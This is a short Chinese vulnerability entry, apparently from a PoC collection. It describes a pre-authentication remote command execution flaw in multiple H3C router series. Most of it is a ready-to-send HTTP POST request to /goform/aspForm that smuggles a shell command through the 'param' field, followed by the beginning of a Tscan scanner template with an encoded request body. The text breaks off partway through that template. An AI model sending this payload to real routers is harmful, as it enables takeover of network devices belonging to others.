0x01漏洞描述
H3C多系列路由器存在前台RCE漏洞
0x02漏洞复现
(1)payload利用地址:/goform/aspForm
(2)命令执行POC:
POST /goform/aspForm HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/test);
0x03POC使用(Tscan验证)
params: []
name: H3C多系列路由器存在前台RCE漏洞
set:
a2: '"do_cmd.asp"'
a3: '"www"'
body: base64Decode(b'Q01EPURl